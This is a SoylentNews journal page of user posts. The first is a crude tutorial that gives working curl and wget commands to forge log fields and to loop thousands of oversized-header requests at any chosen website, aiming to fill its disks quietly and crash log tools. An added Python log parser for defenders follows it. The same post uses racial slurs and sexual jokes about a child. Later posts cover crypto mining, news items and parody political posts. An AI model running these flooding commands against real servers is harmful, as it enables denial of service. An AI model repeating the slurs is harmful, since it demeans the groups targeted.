
SoylentNews is people



HTTP Headers: For Lulz and for Lulz

Posted by cocaine overdose on Saturday March 17 2018, @02:43AM (#3082)
7 Comments
Security

What's popping my fellow internet professionals. Today I'm going to learn you well about the fun shit you can do with HTTP headers.

You'll need:

  • A lUnix distro
  • Curl + Wget
  • 47 IQ points
  • Run

    export WEBSITE=www.google.com

    where "www.google.com" can be any website you want. For these demonstrations, I'll be using my own bare Nginx server over 1Gb ethernet

If you have none of the above, please consider a different news source. Now, let's begin.

You know about user agents, right? Big bad advertisers want em for "sample sizing" to prop up their numbers. Webmasters want em to "enhance user experience," by selling your data to advertisers. The NSA/Webmasters/Advertisers want em to track you for all various reasons. I'm sure you know you can change these bad boys how ever you wish, right? Maybe you've even fiddled around with changing it to "GoogleBot" or something else completely retarded. Pretty lame, right?

Naw, my negroes, let me introduce you to some cooler shit you can do. Like telling the server monkey/analytics scraper to

wget -U "Go fuck yourself." $WEBSITE

Begets:

10.0.0.10 - - [16/Mar/2018:21:08:38 -0400] "GET / HTTP/1.1" 200 2682 "-" "Go fuck yourself."

Maybe you want something a bit more subtle?

wget -U "I know what you've done." $WEBSITE

Is:

10.0.0.10 - - [16/Mar/2018:21:09:42 -0400] "GET / HTTP/1.1" 200 2682 "-" "I know what you've done."

Still pretty lame. But did you know these can be arbitrarily long? Bet ya didn't you lil bugger. Let's try something a bit interesting, like sending love letters.

wget -U "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh..."'!~~~'" I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai"'!'"~ Your truly, Emelia." $WEBSITE

Really gets those penile juices flowing, right?:

10.0.0.10 - - [16/Mar/2018:21:18:27 -0400] "GET / HTTP/1.1" 200 2682 "-" "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh...!~~~ I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai!~ Your truly, Emelia."

Maybe you've also noticed that there's a big fat "GET / HTTP/1.1" sitting there, ripe for the raping. You'd be an astute little nip if you did. We can change that shit right around with:

wget -U "Go fuck yourself." --method="Go fuck yourself" $WEBSITE

Unfortunately, if the method's borked there won't be no UA:

10.0.0.10 - - [16/Mar/2018:21:22:25 -0400] "GO FUCK YOURSELF / HTTP/1.1" 400 173 "-" "-"

One thing I forgot to mention, these logs are formatted like:

$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"

By default. So that means we can spoof remote_user by doing:

curl mom@$WEBSITE --user-agent "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan"'!'

To get:

10.0.0.10 - mom [16/Mar/2018:21:31:46 -0400] "GET / HTTP/1.1" 200 2682 "-" "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan!"

Or our humble referrer, for those social engineering points:

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/"

For:

10.0.0.10 - paulgraham [16/Mar/2018:21:35:25 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

"Buh wha bout muh bites?" you may quander. Well, we can do that too.

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/" -H "Diaper-Status: SOILED"

Ah well shit, seems like we can't:

10.0.0.10 - paulgraham [16/Mar/2018:21:38:01 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

Or can we?

curl paulgraham@$WEBSITE --user-agent "MY ADULT DIAPER NEEDS TO BE CHANGED URGENTLY. I REQUIRE A BOY OF 7 YEARS FROM COLUMBIA TO WIPE THE FECES FROM WITHIN MY ASS ROLLS TO WITHOUT INTO THE FRESH AIR. AGAIN, THIS REQUEST IS URGENT AND MUST BE ACCEPTED." -e "https://news.ycombinator.com/"

No we can't, because my dyslexia forgot the "body" in "body_bytes_sent." Well, anyway this is just child's shit, or should I say Graham's shit? There's no limit to any of the strings. So you can do something like:

wget -U "$(printf "%0.sA" {1..100})" $WEBSITE

To get:

10.0.0.10 - - [16/Mar/2018:22:05:59 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

Or:

solid_shit=$(printf "%0.sA" {1..10}); wget -U "$(printf "%0.sA" {1..1000})" $WEBSITE

For:

10.0.0.10 - - [16/Mar/2018:22:06:29 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

How about:

curl --user-agent "$(printf "%0.sA" {1..10000})" $WEBSITE

Too bad, it returns a 400 too long error and the log doesn't show our UA. The largest I could get was 8178 As. Which, after a bit of trial and error, gets me a 1MB large nginx_access.log. We can get past that with:

for i in {1..12}; do curl --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

Gives us 97KBs of As in the logfile. Changing that to 200 gives us 1.6MB. If we do 10,000 we get 79MBs. If we were to extrapolate these results, we'd need around 120 million requests to fill up an entire 1TB harddrive. If we wanted to avoid sounding the DDoS alarms, we could request only the 217 byte headers:

for i in {1..10000}; do curl -I --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

That would still get the same result, but the load on the server would be much less noticeable. Props if you can find a small file (preferably 1B) to download instead. Generally speaking, you could set up a small timer to curl on through the weekend and fill up some harddrives. Usually they're monitored by tools or automatically backed up, and that can cause some havoc on its own. But, the real meat is with the tools that reference those logs, or reference the headers in raw form. You can probably cause some buffer overflows in old C programs that are still running, or cause whatever tools are interfacing with the headers to snap like an over-extended spine during an OHP. Do with this info whatever you want, I'm only here to try out this journal system.
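
A defender's view of the log lines in the post above, as an added example (not part of the original journal entry): a parser for the quoted nginx log format that flags the client-controlled fields the post plays with and totals log bytes per source address. The thresholds, finding names and sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter

# nginx "combined" layout as quoted in the post:
#   $remote_addr - $remote_user [$time_local] "$request" $status
#   $body_bytes_sent "$http_referer" "$http_user_agent"
# With nginx's default log escaping a literal " inside a variable is written
# as \x22, so the double quotes below are reliable field delimiters.
COMBINED = re.compile(
    r'^(?P<addr>\S+) - (?P<user>.*?) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*?)" (?P<status>\d{3}) (?P<bytes>\d+) '
    r'"(?P<referer>.*?)" "(?P<agent>.*)"$'
)
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}
MAX_AGENT_LEN = 512  # assumed threshold, tune to your own traffic


def inspect(line, basic_auth_in_use=False):
    """Return findings for one access-log line (empty list = nothing odd)."""
    m = COMBINED.match(line)
    if m is None:
        return ["unparseable"]
    findings = []
    # The first token of $request is whatever the client sent as the method.
    if m["request"].split(" ", 1)[0] not in KNOWN_METHODS:
        findings.append("unknown-method")
    # $remote_user is taken from the Authorization header; on a site that
    # does not use Basic auth, any value other than "-" is unverified input.
    if m["user"] != "-" and not basic_auth_in_use:
        findings.append("unverified-remote-user")
    if len(m["agent"]) > MAX_AGENT_LEN:
        findings.append("oversized-user-agent")
    return findings


def log_bytes_by_source(lines):
    """Total bytes each client address caused to be written to the log."""
    totals = Counter()
    for line in lines:
        m = COMBINED.match(line)
        totals[m["addr"] if m else "unparseable"] += len(line.encode()) + 1
    return totals


# Constructed sample lines, modelled on the log output shown in the post.
SAMPLE = [
    '10.0.0.10 - - [16/Mar/2018:21:08:38 -0400] '
    '"GET / HTTP/1.1" 200 2682 "-" "curl/7.58.0"',
    '10.0.0.10 - - [16/Mar/2018:21:22:25 -0400] '
    '"BOGUS METHOD / HTTP/1.1" 400 173 "-" "-"',
    '10.0.0.10 - mom [16/Mar/2018:21:31:46 -0400] '
    '"GET / HTTP/1.1" 200 2682 "-" "curl/7.58.0"',
    '10.0.0.11 - - [16/Mar/2018:22:06:29 -0400] '
    '"HEAD / HTTP/1.1" 200 0 "-" "' + "A" * 8178 + '"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(inspect(line), line[:80])
    print(log_bytes_by_source(SAMPLE).most_common())
```

The 8178-character ceiling reported in the post is consistent with nginx's default `large_client_header_buffers 4 8k`, where one header line must fit in a single 8192-byte buffer. Lowering that size and rotating logs by size bounds how much a single request can write.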

I Might Bootstrap A Large LiteCoin Mining Operation

Posted by MichaelDavidCrawford on Friday March 16 2018, @11:26PM (#3081)
18 Comments
Code

However I have not yet decided on the value of $LARGE. That will be determined by how many LiteCoin mining rigs I can operate without having to hire any help.

Most likely "LARGE=One_Cabinet".

Opus Interactive quoted me $299 per month for 12U in their Portland data center. I think that's big enough for 12 Antminers and 12 power supplies.

However that quote was for just 15 Amps at 110 Volts. With their power supply, one Antminer L3+ mining rig with one APW++ power supply consumes 1000 Watts so I just now requested a quote for lots more power.

I do understand that means they will charge me for lots more cooling. My present living situation limits me to three rigs.

I presently estimate that I would break even with three rigs, but I haven't gotten their power quote yet.

I've been puzzling over whether I should buy a car with my next paycheck. To have a car would make my life quite a lot easier but to spend all that money would mean that I can't go as long without a client.

But were I to colocate anything in Opus' data center it would be a huge Pain In The Ass to take all my gear on the bus.

I'm also wondering whether that would work were I to use taxis.

I Should Not Code While Hallucinating

Posted by MichaelDavidCrawford on Friday March 16 2018, @11:17PM (#3080)
1 Comment
Code

"What do you see?" asked the psychiatrist.

"There are worms coming out of your face."

=========

#!/bin/sh
#
# build_foo

echo Building foo Release kernel extension

xcode_version=8.3.3 // Surely there is a better way to do this

sdk=/Applications/Xcode_"$xcode_version"/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.12.sdk

The better way is called "xcodeselect" but I haven't tried it yet.

Armed teacher becomes accidental school shooter, injures 3

Posted by DeathMonkey on Wednesday March 14 2018, @11:19PM (#3077)
15 Comments
News

Just in case we were wondering if arming teachers is a good idea:

As thousands of students walked out of their schools on Wednesday to pressure Congress to approve gun control legislation, three other students were healing from wounds inflicted when a teacher’s firearm accidentally discharged in a California classroom.

The teacher, Dennis Alexander, who is also a city councilman in Seaside, Calif., was showing the students a gun on Tuesday during his advanced public safety class at Seaside High School when the gun accidentally went off, Marci McFadden, a spokeswoman for the Monterey Peninsula Unified School District, said in a phone interview on Wednesday.

Across the country, another school was also investigating a weapon that discharged accidentally this week. The Alexandria Police Department in Virginia said that a school resource officer accidentally fired his gun inside his office at George Washington Middle School on Tuesday morning. Nobody was hurt, the police said.

Teacher’s Gun Is Accidentally Fired During Public Safety Class, Injuring 3

🗳 Very close race in Pennsylvania! 🍿

Posted by realDonaldTrump on Wednesday March 14 2018, @11:18PM (#3076)
14 Comments
News

It's a very close race in the 18th district of Pennsylvania. A VERY SPECIAL election. And we haven't gone through all the legal on that one. Whoever ends up winning, it'll be a hard fought victory. The people of Pennsylvania are great. If they chose Rick Saccone for Congress, he will be much better for steel and business. Very strong on experience and what our Country -- and our 🐘 Party -- needs. We need that seat, believe me. We need more Republicans to continue our already successful agenda! Rick is a great guy. He's always had my TOTAL support. I'm not a lawyer, as everybody knows. I'm a builder. I'm an actor. And I'm a politician. But if there's anything I can do on the legal, anything he wants, he knows where to find me. Rick's a fighter, I know he's going to fight very hard on the legal. And Jill Stein, maybe she'll raise some money to do a recount. Or whatever she does with that money.

But if they chose Conor, they made a great choice too. I'll work with him. And I think we can get some terrific things done. So many Dems do nothing but obstruct. And they talk about nothing but Donald J. Trump. I just came back from San Diego & Los Angeles, they love me there. Tremendous crowds wherever I went. But Dirty Maxine is always going "Trump, Trump, Trump." Instead of fixing some of the big problems in her district -- a very sad situation, totally out of control. Conor's not like that, he's never said anything against me. That's very special. And very smart. I love the way he looks, he's a handsome guy. He supports me on the steel & aluminum tariffs, which I did for the hard working folks in Pennsylvania. He knows Pennsylvania needs them. So we can stop losing our industry there. Have you seen his ads? He has a great one where he's shooting, maybe an AR-15? They're saying it's an AR-15. Very gun-adept guy, very weapons talented, he's part of the 20% with military or special training. Our military needs to be much stronger, so strong that no one will want to get into a war with us. I know Conor wants that, 100%. Hopefully he'll see how important it is to upgrade & modernize our nuclear arsenal. He goes both ways on abortion. Like the guy who left, former Congressman Tim Murphy. That was one of his big issues, probably the biggest. And he decided to go both ways on that one.

The drugs, I love what Conor's been doing about the drugs. As you know he did some great work with the U.S. Attorney's office in Pittsburgh. Where he was a prosecutor. So many drug dealers LOCKED UP because of him. You kill 5,000 people with drugs because you’re smuggling them in and you are making a lot of money and people are dying. And they don’t even put you in jail. That’s why we have a problem, folks. I don’t think we should play games. And Conor doesn't play. The only way to solve the drug problem is through toughness. When you catch a drug dealer, you’ve got to put him away for a long time. Great job!

Some countries have a very, very tough penalty -- the ultimate penalty. And, by the way, they have much less of a drug problem than we do. A while back I talked to the President of Singapore, President Tan -- they replaced him with a lady now. And I asked him, are you having the same problems we're having with the opioids? And he told me, "we have a zero tolerance policy. That means if we catch a drug dealer, death penalty." Same thing in China, they do executions, they're very tough about it. The Philippines, President Duterte is doing a great job. I don’t know if this country’s ready for it, but I think that's a discussion we have to start thinking about. Probably you'll have some people who say "oh, that's not nice." But we have to do something. And believe me, eventually we'll get something done. Do you think the drug dealers who kill thousands of people during their lifetime, do you think they care who’s on a blue-ribbon committee? We can't just keep setting up blue ribbon committees and all they do is talk, talk, talk.

Open Circuit

Posted by MichaelDavidCrawford on Wednesday March 14 2018, @10:40PM (#3075)
9 Comments
Code

It will be fixed in 1.0b16, which I will build a little later today. I have some open bugs, maybe I can resolve some of them with their fixes also being in 1.0b16.

PackageMaker enables one to specify the ownership and permissions for each component. screen_capture.log's permissions somehow got set to:

      -rw-r--r--

That's the correct permissions for the LaunchAgent property lists. Perhaps the bug is the result of an error between seat and keyboard.

      ;-)

It's owned by root so only root processes could write to it. The perms should be:

      -rw-rw-rw-

Those. Ignorant. Mother. Fuckers.

Posted by MichaelDavidCrawford on Wednesday March 14 2018, @09:05PM (#3074)
6 Comments
Hardware

That's what I call people who harsh my buzz.

My Antminer L3+ emits a very loud, very high-pitched and very pure tone.

I at first feared it was an alarm but the unit's Fault LED doesn't turn on.

Its participation in Coin Foundry's LTC mining pool looks copacetic - my status on the pool's page has the right hash rate. I've received two payouts.

(And I now have 109 Ducats burning a hole in my pocket!)

I filed a ticket.

Bitmain support said it was likely a loose part in one of the fans. I don't think it's either fan: I powered up the unit then one at a time - and very very briefly - I disconnected then reconnected each fan's power cable yet came away empty-handed.

I speculate it's a loose heatsink. The instructions that came with my unit very clearly - urgently even - warned about loose heatsinks and that Bitmain wouldn't honor their warranty if the user permitted the ASICs to fry themselves like eggplants.

Inside the enclosure each of the three hashing boards has a very elaborate heatsink. There's two or three hundred very small ASICs, each of which is bonded to its own sink. Perhaps I can find some multimedia to enhance your experience of my presentation...

OBSERVE.

The pure tone indicates that the vibration is from a metallic object. The small fins of which the heatsink is composed look like they'd produce the right frequency if they were vibrating.

There are instructions somewhere on Bitmain's site for individually testing each hashing board. I'm going to follow the disassembly and reassembly instructions so that I can get up close and personal with all those gall-during aluminum thingies.

Here's why I regard Bitmain support as being staffed by Ignorant Mother Fuckers:

After sending me their incorrect suggestion that the tone comes from a loose fan part, they marked my incident as Closed.

It's not closed dammit!

The customer is always right, and _this_ customer has yet to achieve satisfaction.

BREAKING: I Have A Cyberstalker!

Posted by MichaelDavidCrawford on Wednesday March 14 2018, @10:58AM (#3072)
10 Comments
Career & Education

How cool is that?

I haven't heard from modus in eons.

She wants to have my baby.

I don't have the first clue who this chick is. I have the idea that I might pry from her iron grip the reason why she chose _me_ in particular, but so far I've had no joy.

When I can get my new soulmate to slow down by a profoundly significant quantity, I'll post more in the comments.

But for now I'll leave you with:

Well if you have not being taken by someone special can i have the chance to get the key into your heart, and i promise not to hurt you or break it's apart for you....

Okay Well you know the best way to be love is to love like you have never never been hurt before and true love is hard to find but when found, it's everlasting, and A true friend is a true love..

I'm uncertain but I think the chances are quite good that she's actually a Bot. No mere human being could type so fast.

And if she is a Bot I expect that Bot was written by one of my friends so they could have a little fun at my considerable expense.

Maybe she's just on Shrooms.

God bless the U.S. Marines!✝️🔫

Posted by realDonaldTrump on Wednesday March 14 2018, @01:36AM (#3071)
6 Comments
Topics

It was my great honor to deliver a message at the Marine Core Air Station Miramar to our GREAT U.S. Military, straight from the heart of the American People: We support you, we thank you, we love you, and we will always, always have your back! pic.twitter.com/oCt1nH3DON

All across this nation, we pray for our country and we THANK GOD for our United States Marines! Thank you. God Bless You. And God Bless America! pic.twitter.com/vKXBd0CGH1

CIA pick tortured the wrong guy, then destroyed the evidence

Posted by DeathMonkey on Tuesday March 13 2018, @06:29PM (#3069)
19 Comments
News

Rex Tillerson has been fired as Secretary of State; CIA director Mike Pompeo has been nominated to replace him. Donald Trump’s nominee to replace Pompeo at the CIA is Gina Haspel, who had been the agency’s deputy director.

In 2002, Haspel was present, in a supervising role, at a “black site” in Thailand where an individual named Abu Zubaydah—believed to be a top al-Qaida official—was tortured. Zubaydah was waterboarded, slammed against a wall, and confined in a “coffin-like” box. As ProPublica reported in 2017, though, “CIA analysts were wrong when they had identified Zubaydah as the number three or four in al-Qaida after Osama bin Laden. The waterboarding failed to elicit valuable intelligence not because he was holding back, but because he was not a member of al-Qaida, and had no knowledge of any plots against the United States.”

He remains imprisoned at Guantánamo Bay and, as the New Yorker’s Dexter Filkins has noted, lost his left eye at some point after being captured under circumstances that remain unclear.

When questions began to swirl about the Bush administration’s use of the “black sites,” and program of “enhanced interrogation,” [Haspel] began pushing to have the tapes destroyed. She accomplished her mission years later when she rose to a senior position at CIA headquarters and drafted an order to destroy the evidence, which was still locked in a CIA safe at the American embassy in Thailand. Her boss, the head of the agency’s counterterrorism center, signed the order to feed the 92 tapes into a giant shredder.

Trump’s Nominee to Lead CIA Supervised Torture of Mistakenly Identified Subject, Then Destroyed Evidence